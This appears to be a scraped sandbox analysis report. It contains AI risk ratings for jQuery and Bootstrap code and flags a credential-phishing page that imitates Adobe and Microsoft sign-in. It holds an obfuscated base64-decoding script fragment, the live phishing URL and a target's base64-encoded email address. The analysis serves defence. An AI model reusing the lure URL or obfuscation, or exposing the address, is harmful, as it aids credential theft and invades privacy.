rh13z8jemt = absorption('e') == '' ? rh13z8jemt : absorption('e');
rh13z8jemt = atob(rh13z8jemt);
|
| URL: https://code.jquery.com/jquery-3.2.1.slim.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the minified version of the jQuery library, which is a widely-used and trusted JavaScript library. The code does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or suspicious redirects. The behaviors observed are typical of a legitimate JavaScript library, including DOM manipulation, event handling, and utility functions. While the code is minified, this is a common practice to optimize file size and performance, and does not inherently indicate malicious intent. Overall, this script is considered low risk."
} |
/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */
!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(f.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(a<0?b:0);return this.pushStack(c>=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||r.isFunction(g)||(g={}),h===i&&(g=this,h--);h<i;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(r.isPlainObject(d)||(e=Array.isArray(d)))?(e?(e=!1,f=c&&Array.isArray(c)?c:[]):f=c&&r.isPlainObject(c)?c:{},g[b]=r.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},r.extend({expando:"jQuery"+(q+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===r.type(a)},isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=r.type(a);return("number"===b||"string"===b)&&!isNaN(a-parseFloat(a))},isPlainObject:function(a){var b,c;return!(!a||"[object Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?j[k.call(a)]||"object":typeof a},globalEval:function(a){p(a)},camelCase:function(a){return a.replace(t,"ms-").replace(u,v)},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(s,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(w(Object(a))?r.merge(c,"string"==typeof a?[a]:a):h.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:i.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;d<c;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;f<g;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,f=0,h=[];if(w(a))for(d=a.length;f<d;f++)e=b(a[f],f,c),null!=e&&h.push(e);else for(f in a)e=b(a[f],f,c),null!=e&&h.push(e);return g.apply([],h)},guid:1,proxy:function(a,b){var c,d,e;if("string"==typeof b&&(c=a[b],b=a,a=c),r.isFunction(a))return d |
| URL: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the Bootstrap JavaScript library, which is a widely-used and trusted open-source front-end framework. The code does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. It is primarily focused on providing functionality for common UI components and interactions, which is consistent with the expected behavior of the Bootstrap library. There are no signs of obfuscation or suspicious activities, and the code is well-documented and licensed under MIT. Overall, this is a low-risk script that is commonly used in legitimate web development projects."
} |
/*!
* Bootstrap v4.1.3 (https://getbootstrap.com/)
* Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enumerable}))),e.forEach(function(t){var e,n,i;e=r,i=o[n=t],n in e?Object.defineProperty(e,n,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[n]=i})}return r}e=e&&e.hasOwnProperty("default")?e.default:e,h=h&&h.hasOwnProperty("default")?h.default:h;var r,n,o,a,c,u,f,d,g,_,m,p,v,y,E,C,T,b,S,I,A,D,w,N,O,k,P,j,H,L,R,x,W,U,q,F,K,M,Q,B,V,Y,z,J,Z,G,$,X,tt,et,nt,it,rt,ot,st,at,lt,ct,ht,ut,ft,dt,gt,_t,mt,pt,vt,yt,Et,Ct,Tt,bt,St,It,At,Dt,wt,Nt,Ot,kt,Pt,jt,Ht,Lt,Rt,xt,Wt,Ut,qt,Ft,Kt,Mt,Qt,Bt,Vt,Yt,zt,Jt,Zt,Gt,$t,Xt,te,ee,ne,ie,re,oe,se,ae,le,ce,he,ue,fe,de,ge,_e,me,pe,ve,ye,Ee,Ce,Te,be,Se,Ie,Ae,De,we,Ne,Oe,ke,Pe,je,He,Le,Re,xe,We,Ue,qe,Fe,Ke,Me,Qe,Be,Ve,Ye,ze,Je,Ze,Ge,$e,Xe,tn,en,nn,rn,on,sn,an,ln,cn,hn,un,fn,dn,gn,_n,mn,pn,vn,yn,En,Cn,Tn,bn,Sn,In,An,Dn,wn,Nn,On,kn,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),document.getElementById(t););return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=i(t).css("transition-duration");return parseFloat(e)?(e=e.split(",")[0],1e3*parseFloat(e)):0},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(t){i(t).trigger(e)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var i in n)if(Object.prototype.hasOwnProperty.call(n,i)){var r=n[i],o=e[i],s=o&&l.isElement(o)?"element":(a=o,{}.toString.call(a).match(/\s([a-z]+)/i)[1].toLowerCase());if(!new RegExp(r).test(s))throw new Error(t.toUpperCase()+': Option "'+i+'" provided type "'+s+'" but expected type "'+r+'".')}var a}};return i.fn.emulateTransitionEnd=t,i.event.special[l.TRANSITION_END]={bindType:e,delegateType:e,handle:function(t){if(i(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function(t){var e=this._element;t&&(e=this._getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=r(t).closest("."+f)[0]),n},t._triggerCloseEvent=function(t){var e=r.Event(u.CLOSE);return r(t).trigger(e),e},t._removeElement=function(e){var n=this;if(r(e).removeClass(g),r(e).hasClass(d)){var t=Fn.getTransitionDurationFromElement(e);r(e).one(Fn.TRANSITION_END,function(t){return |
| URL: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script is a known version of Bootstrap (v4.0.0), a widely used front-end framework. It does not exhibit any high-risk behaviors such as dynamic code execution or data exfiltration. The script primarily involves DOM manipulation and event handling, which are typical for UI frameworks. There are no interactions with untrusted domains or obfuscated code present."
} |
/*!
* Bootstrap v4.0.0 (https://getbootstrap.com)
* Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProperty("default")?n.default:n;var o,a,l,h,c,u,f,d,_,g,p,m,v,E,T,y,C,I,A,b,D,S,w,N,O,k,P=function(t){var e=!1;function n(e){var n=this,s=!1;return t(this).one(i.TRANSITION_END,function(){s=!0}),setTimeout(function(){s||i.triggerTransitionEnd(n)},e),this}var i={TRANSITION_END:"bsTransitionEnd",getUID:function(t){do{t+=~~(1e6*Math.random())}while(document.getElementById(t));return t},getSelectorFromElement:function(e){var n,i=e.getAttribute("data-target");i&&"#"!==i||(i=e.getAttribute("href")||""),"#"===i.charAt(0)&&(n=i,i=n="function"==typeof t.escapeSelector?t.escapeSelector(n).substr(1):n.replace(/(:|\.|\[|\]|,|=|@)/g,"\\$1"));try{return t(document).find(i).length>0?i:null}catch(t){return null}},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"element":(l=o,{}.toString.call(l).match(/\s([a-zA-Z]+)/)[1].toLowerCase());if(!new RegExp(r).test(a))throw new Error(t.toUpperCase()+': Option "'+s+'" provided type "'+a+'" but expected type "'+r+'".')}var l}};return e=("undefined"==typeof window||!window.QUnit)&&{end:"transitionend"},t.fn.emulateTransitionEnd=n,i.supportsTransitionEnd()&&(t.event.special[i.TRANSITION_END]={bindType:e.end,delegateType:e.end,handle:function(e){if(t(e.target).is(this))return e.handleObj.handler.apply(this,arguments)}}),i}(e),L=(a="alert",h="."+(l="bs.alert"),c=(o=e).fn[a],u={CLOSE:"close"+h,CLOSED:"closed"+h,CLICK_DATA_API:"click"+h+".data-api"},f="alert",d="fade",_="show",g=function(){function t(t){this._element=t}var e=t.prototype;return e.close=function(t){t=t||this._element;var e=this._getRootElement(t);this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},e.dispose=function(){o.removeData(this._element,l),this._element=null},e._getRootElement=function(t){var e=P.getSelectorFromElement(t),n=!1;return e&&(n=o(e)[0]),n||(n=o(t).closest("."+f)[0]),n},e._triggerCloseEvent=function(t){var e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(t)},e._destroyElement=function(t){o(t).detach().trigger(u.CLOSED).remove()},t._jQueryInterface=function(e){return this.each(function(){var n=o(this),i=n.data(l);i||(i=new t(this),n.data(l,i)),"close"===e&&i[e](this)})},t._handleDismiss=function(t){return function(e){e&&e.preventDefault(),t.close(this)}},s(t,null,[{key:"VERSION",get:function(){return"4.0.0"}}]),t}(),o(document).on(u.CLICK_DATA_API,'[data-dismiss="alert"]',g._handleDismiss(new g)),o.fn[a]=g._jQueryInterface,o.fn[a].Constructor=g,o.fn[a].noConflict=function(){return o.fn[a]=c,g._jQueryInterface},g),R=(m="button",E="."+(v="bs.button |
| URL: https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw== Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw== Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw== Model: Joe Sandbox AI | ```json{ "legit_domain": "adobe.com", "classification": "wellknown", "reasons": [ "The URL 'clicktoviewdocumentonadovemacroreader.federalcourtbiz.com' does not match the legitimate domain for Adobe, which is 'adobe.com'.", "The URL contains suspicious elements such as 'clicktoviewdocumentonadovemacroreader', which is unusually long and complex, often a tactic used in phishing.", "The domain 'federalcourtbiz.com' is not associated with Adobe or Microsoft, which raises suspicion.", "The presence of a password input field on a site claiming to be related to Adobe is unusual and could indicate a phishing attempt.", "The brand 'Microsoft' is not relevant to the URL provided, which adds to the suspicion." ], "riskscore": 9}
Google indexed: False |
URL: clicktoviewdocumentonadovemacroreader.federalcourtbiz.com
Brands: Microsoft
Input Fields: password |
| URL: https://federalcourtbiz.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://federalcourtbiz.com |
Edit tour
chrome.exe (PID: 7048 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node